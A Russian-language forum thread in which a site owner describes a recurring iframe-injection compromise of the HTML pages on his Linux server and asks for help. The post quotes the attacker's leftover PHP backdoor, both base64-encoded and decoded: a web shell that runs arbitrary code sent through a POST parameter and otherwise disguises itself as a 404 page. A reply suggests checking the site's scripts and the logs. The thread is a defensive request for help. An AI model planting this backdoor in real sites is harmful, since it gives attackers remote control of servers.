Подскажите пожалуйста, ни я ни админ не можем справится.. Дело в том что 4-5 дней назад на моём сервере под одним логином запустили скрипт который во ВСЕ хтмл страницы папки пользователя (линукс система) вставила ифрейм перед <body> с ссылкой на фирус. Я все файлы перелил заного а в других просто удалил ифрейм, поменял все пароли, след. ночью снова тоже самое произошло.. я переустановил винду и поменял все пароли (на сервере, включая рута и поставил касперского + комодо фаервол дома).. сегодня ночью опять поменялись все хтмл.. я от этого сильно страдаю, уже половина доменов в блеке мозилла и сильно упал траффик на других доменах, которые под этим пользователем. После себя взломщик оставляет пхп файл след содержания: <?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?> вот в раскриптованом виде: if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found'); Подскажите что делать, на сервере не можем ничего найти и на домашнем компе тоже. Если это автоматом где то прописывается или чья эта работа - большая просьба соотечественного выключить мой урл с базы.. отпишите сюда пожалуйста. Сильно буду благодарен, вы мне сильно поможете.
Потомучто ищи не у себя на компе а дырку в скиптах сайта или тупо shell . Админа втопку. Анализ логов поможет вам.
Да в том то и дело что там только один скрипт, скрипт распределения траффика http://www.arrowscripts.com/atl3_dl.shtml.. я искал в поисковиках, в нём вроде нету уязвимости, иначе бы уже тысячи сайтоа повалились бы..